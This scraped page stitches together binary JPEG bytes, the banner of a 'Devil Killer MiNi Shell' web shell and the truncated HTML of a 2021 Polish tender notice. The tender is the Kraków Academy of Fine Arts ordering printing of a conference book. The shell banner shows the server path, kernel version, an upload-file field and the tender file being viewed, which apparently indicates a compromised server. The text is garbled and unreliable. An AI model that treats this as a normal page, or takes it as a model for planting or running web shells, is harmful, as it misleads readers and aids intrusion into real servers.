JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210622/0009034301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00090343 z dnia 2021-06-22</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Druk i dostawa publikacji - wydawnictwa pokonferencyjnego „Prawda i prawdziwość w sztuce” - dla Akademii Sztuk Pięknych im. Jana Matejki w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Sztuk Pięknych im. Jana Matejki w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 6750007570</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Jana Matejki 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-157</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 12 299 20 42</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@asp.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.asp.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Druk i dostawa publikacji - wydawnictwa pokonferencyjnego „Prawda i prawdziwość w sztuce” - dla Akademii Sztuk Pięknych im. Jana Matejki w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c525a1a6-d33f-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00090343</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000104/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Druk i dostawa wydawnictwa pokonferencyjnego „Prawda i prawdziwość w sztuce”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/asp_krakow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu następujących środków<br/>komunikacji elektronicznej:<br/>1) Platformy zakupowej do obsługi postępowań o zamówienia publiczne, dostępnej pod adresem:<br/>https://platformazakupowa.pl/pn/asp_krakow<br/>2) poczty elektronicznej – adres e-mail: zp@asp.krakow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się<br/>przyużyciu następujących środków komunikacji elektronicznej:1) Platformy zakupowej do obsługi<br/>postępowań o zamówienia publiczne, dostępnej pod<br/>adresem:https://platformazakupowa.pl/pn/asp_krakow2) poczty elektronicznej – adres e-mail:<br/>zp@asp.krakow.pl- z zastrzeżeniem, iż oferta wraz z załącznikami, pełnomocnictwa, podmiotowe<br/>środki dowodowe orazzobowiązanie podmiotów udostępniających zasoby mogą zostać przekazane<br/>wyłącznie za pomocąpowyższej Platformy.Zamawiający nie przewiduje sposobu komunikowania się z<br/>Wykonawcami w inny sposób niż przyużyciu środków komunikacji elektronicznej, wskazanych w<br/>niniejszej SWZ.Zamawiający, zgodnie z art.67 ustawy Pzp, określa wymagania techniczne i<br/>organizacyjnesporządzania, wysyłania i odbierania korespondencji elektronicznej, tj.: 1) Minimalne<br/>wymaganiasprzętowo-aplikacyjne konieczne do przesyłania plików za pomocą poczty<br/>elektronicznej:a)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512kb/s,b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2GB, procesor Intel IV<br/>2GHz,jeden z systemów operacyjnych - MS Windows, Mac Os, Linux,c) zainstalowana dowolna<br/>przeglądarka internetowa,d) włączona obsługa JavaScript,e) zainstalowany program Acrobat<br/>Reader.2) Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej -platformazakupowa.pl:a) stały dostęp do sieci Internet o gwarantowanej przepustowości<br/>nie mniejszej niż 512 kb/s,b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min.2 GB<br/>Ram, procesor IntelPentium IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS<br/>Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje,c) zainstalowana dowolna przeglądarka<br/>internetowa, w przypadku Internet Explorer minimalnie wersja10.0,d) włączona obsługa JavaScript,e)<br/>zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,f)<br/>platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej -<br/>kodowanieUTF8,g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz<br/>dokładny czas(hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem<br/>GłównegoUrzędu Miar.3) Do danych zawierających dokumenty tekstowe, tekstowo-graficzne lub<br/>multimedialne stosuje sięmiędzy innymi formaty plików: .txt; .rft; .pdf; .xps; .odt; .ods; .odp; .doc; .xls;<br/>.ppt; .docx; .xlsx; .pptx;.csv. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg<br/>(.jpeg) ze szczególnymwskazaniem na .pdf.W postępowaniu występuje sytuacja określona w art. 65<br/>ust. 1 pkt 4) ustawy Pzp Wobec powyższegoZamawiający częściowo odstępuje od wymagania użycia<br/>środków komunikacji elektronicznej (wzakresie złożenia próbki do oceny jakości) Złożenie próbki do<br/>oferty odbywa się za pośrednictwemoperatora pocztowego w rozumieniu ustawy z dnia 23 listopada<br/>2012 – Prawo pocztowe (tekst jednolityDz.U. z 2020 poz. 1041 ze zmianami), osobiście lub za<br/>pośrednictwem posłańca.Szczegółowe informacje w zakresie wymagań techniczno - organizacyjnych<br/>dot. korespondencji elektronicznej opisano w rozdziale IX SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: <span class="normal"></h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">Wymaganą, badaną i ocenianą przez Zamawiającego w przedmiotowym postępowaniu próbkę, o której mowa w SWZ należy złożyć, na mocy postanowień art. 65 ust. 2 ustawy Pzp, w postaci drukowanej jednej książki wraz z pismem przewodnim opatrzonym własnoręcznym podpisem<br/>osoby upoważnionej ze strony Wykonawcy, oznaczyć zgodnie z instrukcją podaną w rozdziale XIX<br/>SWZ oraz złożyć z zachowaniem nieprzekraczalnego terminu wyznaczonego na składanie ofert w niniejszym postępowaniu. Złożenie próbki do oferty odbywa się za pośrednictwem operatora<br/>pocztowego w rozumieniu ustawy zdnia 23 listopada 2012 – Prawo pocztowe (tekst jednolity Dz.U. z 2020 poz. 1041 ze zmianami),osobiście lub za pośrednictwem posłańca. <br/>Próbka winna być dostarczona pod adres Zamawiającego: Akademia Sztuk Pięknych im. Jana Matejki w Krakowie, 31-157 Kraków, Plac Matejki 13 – Biuro Zamówień Publicznych – I piętro, pokój nr 113. Próbkę należy złożyć zgodnie z wymaganiami, które podano w rozdziale VIII niniejszej SWZ oraz w trwale zamkniętej kopercie, gwarantującej jej nienaruszenie do dnia otwarcia. Na kopercie należy umieścić informację wg wzoru:<br/><br/>Nazwa (firma) Wykonawcy dokładny adres Wykonawcy adres do korespondencji, kontaktowy numer telefonu<br/><br/>Akademia Sztuk Pięknych im. Jana Matejki w Krakowie<br/>31-157 Kraków, Plac Jana Matejki 13<br/><br/>Próbka do oceny jakości <br/>w postępowaniu pod nazwą: Druk i dostawa publikacji - wydawnictwa pokonferencyjnego „Prawda i prawdziwość w sztuce” - dla Akademii Sztuk Pięknych im. Jana Matejki w Krakowie<br/><br/>– numer referencyjny BZP-3942-32/2021<br/><br/>Nie otwierać przed dniem 30 czerwca 2021 roku - godziną 12:00*<br/><br/>*w przypadku dokonania przez Zamawiającego zmiany terminu składania ofert należy wpisać aktualny termin<br/><br/>W przypadku nieprawidłowego zaadresowania lub zamknięcia koperty Zamawiający nie bierze odpowiedzialności za złe skierowanie przesyłki i jej nieterminowe dostarczenie jak i przedterminowe otwarcie.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Akademia Sztuk Pięknych im. Jana Matejki w Krakowie<br/>zsiedzibą przy Placu Matejki 13, 31-157 Kraków (dalej „ASP w Krakowie”) przetwarza dane zawarte w<br/>ofertach albo wnioskach o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia<br/>publicznego, w wymaganych dokumentach, oświadczeniach, dane znajdujące się w<br/>publiczniedostępnych rejestrach (Krajowy Rejestr Sądowy, Centralna Ewidencja i Informacja o<br/>Działalności Gospodarczej RP, Krajowy Rejestr Karny) w celu prowadzenia postępowań o udzielenie<br/>zamówieniapublicznego na podstawie przepisów ustawy z dnia 11 września 2019r. Prawo zamówień<br/>Publicznych(t.j. Dz.U. z 2019 r. poz. 2019 z późn. zm.). Wśród tych informacji mogą pojawiać się dane,<br/>które nagruncie Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/ 679 - z dnia 27 kwietnia<br/>2016 r. -w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawieswobodnego przepływu takich danych oraz uchylenia dyrektywy 95/ 46/ WE (ogólne<br/>rozporządzenie oochronie danych) (europa.eu) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”<br/>lub „OgólneRozporządzenie”, mają charakter danych osobowych.2. Zgodnie z art. 13 ust. 1 i 2<br/>Ogólnego Rozporządzenia, wszystkie osoby, które ubiegają się o udzielenie zamówienia / złożyły<br/>ofertę, Zamawiający informuje, że: Administratorem Danych jest Akademia Sztuk Pięknych im. Jana<br/>Matejki w Krakowie z siedzibą przy Placu Matejki 13, 31-157Kraków, NIP: 675-00-07-570 REGON:<br/>000275783.Pana/Pani dane osobowe są przetwarzane na podstawie art. 6 ust.1 lit. c RODO, tj.<br/>przetwarzanie jest niezbędne do wypełniania obowiązku prawnego ciążącego na Administratorze. Cel<br/>przetwarzania danych osobowych jest związany z prowadzeniem postępowania i realizacją umowy<br/>zawieranej w wyniku postępowania o udzielenie zamówienia publicznego, znak postępowania: BZP-<br/>3942-32/2021. 4) Pani/Pana dane osobowe przetwarzane będą także w celu realizacji obowiązku<br/>prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia 14 lipca<br/>1983r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164). Pana/Pani dane<br/>będą przechowywane przez okres 5 lat liczony od dnia 1 stycznia roku następującego po roku, w<br/>którym zakończone zostało postępowanie o udzielenie zamówienia publicznego, za wyjątkiem umów,<br/>które będą przechowywane przez okres lat 10. 5)Pani/Pana dane pozyskane w związku z<br/>postępowaniem o udzielenie zamówienia publicznego przekazywane będą członkom komisji<br/>przetargowych i upoważnionym pracownikom ASP w Krakowie jak również wszystkim<br/>zainteresowanym<br/>podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest<br/>jawne. Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie w<br/>szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt 1<br/>i<br/>2 ustawy Pzp. Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli<br/>obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć dostęp<br/>podmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną, usługi<br/>informatyczne, jak również inni administratorzy danych osobowych przetwarzający dane we własnym<br/>imieniu, np. podmioty prowadzące działalność pocztową lub kurierską. Zgodnie z RODO przysługuje<br/>Pani/Panu: a) prawo dostępu do swoich danych oraz otrzymania ich kopii; b) prawo do sprostowania<br/>(poprawiania) swoich danych; c) prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie<br/>danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa, d) prawo do<br/>ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość<br/>skorzystania z tego prawa. Szczegółowe obowiązki informacyjne wynikające z rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z 27kwietnia 2016r. zostały wskazane w Specyfikacji Warunków Zamówienia - rozdział XXV</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W postępowaniu o udzielenie zamówienia<br/>zgłoszenieżądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP-3942-32/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa pn.: Druk i dostawa publikacji - wydawnictwa pokonferencyjnego „Prawda i prawdziwość w sztuce” - dla Akademii Sztuk Pięknych im. Jana Matejki w Krakowie.<br/>2.	Publikacja jest realizowana w ramach Potencjału Badawczego WRZ „Krakowska Szkoła Rzeźby” - zadanie nr 21.<br/>3.	Druk w.w. publikacji będzie realizowany na materiałach własnych Wykonawcy<br/>4.	Przedmiot zamówienia obejmuje następujący zakres: <br/>1)	niezbędne czynności przygotowawcze <br/>2)	druk, oprawę publikacji zgodnie z parametrami wskazanymi przez Zamawiającego w załączniku nr 1 do niniejszej SWZ – Opis przedmiotu zamówienia (OPZ)<br/>3)	dostawę nakładu rozumianą jako transport wydrukowanych książek (wraz z wniesieniem we wskazane miejsca w budynku) do siedziby Wydziału Rzeźby Akademii Sztuk Pięknych im. Jana Matejki, 31-157 Kraków, Plac Matejki 13. Docelowe miejsce dostawy i rozładunku książek znajduje się na parterze. <br/>5.	Odbiór wydrukowanego nakładu książki objętej zamówieniem, będzie się odbywał w momencie jego wydania upoważnionemu do odbioru pracownikowi Zamawiającego i zostanie potwierdzony jego podpisem na protokole odbioru. <br/> Podpisanie protokołu odbioru bez zastrzeżeń, nie oznacza potwierdzenia przez Zamawiającego braku wad fizycznych i prawnych przedmiotu zamówienia.<br/>6. Szczegółowe warunki dotyczące realizacji zamówienia zostały określone w załączniku nr 3 do niniejszej SWZ – Projektowane postanowienia umowy.<br/>7. Kody ze Wspólnego Słownika Zamówień CPV:<br/> CPV 79823000-9 – usługi drukowania i dostawy<br/>8. Zamawiający informuje, iż nie dokonał podziału zamówienia na części w niniejszym postępowaniu bowiem przedmiot zamówienia (druk nakładu jednej publikacji) w tym postepowaniu stanowi integralną całość i nie da się go podzielić na odrębne zamówienia. Jest to jednak zamówienie udzielane w częściach, a przedmiotem odrębnych postępowań o udzielenie zamówienia są kolejne publikacje wydawane przez ASP. Brak podziału na części w postępowaniu nie wpływa na konkurencję. Zamówienie jest o wartości nieprzekraczającej progów UE i z dotychczasowych doświadczeń Zamawiającego wynika, iż o podobne zamówienia ubiegają się wyłącznie małe i średnie przedsiębiorstwa, tak więc zakres zamówienia jest dostosowany do potrzeb sektora MŚP bez konieczności dalszego rozdrabniania zakresu zamówienia.<br/> <br/> Wobec powyższego Zamawiający nie dopuszcza składania ofert częściowych.<br/><br/>9. Oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w SWZ, w tym Załączniku nr 1 do SIWZ – OPZ, zostaną odrzucone.<br/>10. Ze względu na specyfikę przedmiotu zamówienia, w przypadku podania przez Zamawiającego w SWZ, bądź załącznikach do SWZ, nazw materiałów lub znaków towarowych Zamawiający dopuszcza zastosowanie materiałów równoważnych, jednak o parametrach techniczno - jakościowych nie gorszych niż wskazane lub stanowiące dokładne odpowiedniki materiałów wymienionych w specyfikacji druku - opisie przedmiotu zamówienia, zawartym w Załączniku nr 1 do SWZ. Wykonawca oferując materiał (rodzaj papieru) równoważny do opisanego w specyfikacji jest zobowiązany zachować równoważność w zakresie parametrów użytkowych i jakościowych, które muszą być na poziomie nie niższym od parametrów wskazanego przez Zamawiającego w załączniku nr 1 do SWZ materiału.<br/> W przypadku zaoferowania materiałów równoważnych, obowiązkiem Wykonawcy jest udowodnienie równoważności. W przypadku wątpliwości związanych z równoważnością materiałów Zamawiający będzie mógł poprosić o dodatkowe wyjaśnienia do Wykonawcy i/lub niezależnych jednostek badawczych mogących potwierdzić spełnienie wymagań. <br/>11. Podwykonawcy<br/> 1) Wykonawca może powierzyć wykonanie części zamówienia podwykonawcom. <br/>2) Zamawiający nie korzysta z przewidzianego w art. 121 Ustawy uprawnienia i nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań<br/>3) W przypadku powierzenia części zamówienia podwykonawcy, Zamawiający wymaga, aby Wykonawca wskazał w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał (o ile są mu wiadome na tym etapie) nazwy (firmy) tych podwykonawców (zgodnie z art. 462 ust. 2 ustawy Pzp). <br/>4) Brak wskazania w ofercie, zamiaru powierzenia wykonania części zamówienia podwykonawcom będzie uznany jako deklaracja samodzielnej realizacji zamówienia.<br/>5) Powierzenie wykonania zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za należyte wykonanie tego zamówienia. <br/>12. Zgodnie z art. 95 ustawy Pzp Zamawiający wymaga, zatrudnienia przez Wykonawcę bądź Podwykonawcę, na podstawie stosunku pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.- Kodeks pracy (tekst jednolity Dz.U. z 2020r., poz. 1320), osób wykonujących czynności w trakcie realizacji zamówienia: obsługa maszyn drukujących. <br/>13. Sposób dokumentowania zatrudniania na umowę o pracę przez Wykonawcę (Podwykonawcę) oraz sposoby weryfikacji, w tym zakresie przez Zamawiającego, jak również sankcje z tytułu niespełnienia wymogów w zakresie zatrudnienia na umowę o pracę, szczegółowo uregulowano w załączniku nr 3 do niniejszej SWZ – Projektowane postanowienia umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79823000-9 - Usługi drukowania i dostawy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zasady punktacji w poszczególnych kryteriach:<br/>1) punktacja dla kryterium „Cena” – [ C ] – waga 50 %, zostanie ustalona według wzoru: Punkty w kryterium cena [C] x = Cn / Cx x 100 x 50<br/>gdzie:[C] x – liczba punktów przyznana badanej ofercie w kryterium cena<br/>Cn - cena oferty z najniższą ceną spośród złożonych ważnych ofert<br/>Cx - cena badanej oferty<br/>Ilość punktów w kryterium oceny ofert „Cena” zostanie wyliczona jako stosunek najniższej ceny<br/>spośród zaoferowanych do ceny oferty badanej, następnie otrzymany iloraz zostanie pomnożony przez<br/>liczbę 100 oraz liczbę odpowiadającą wadze kryterium.<br/>Maksymalna liczba punktów możliwa do uzyskania w powyższym kryterium to 50 pkt. 2) Sposób oceny<br/>ofert dla kryterium jakość „J”<br/>Ocena złożonych ofert dla 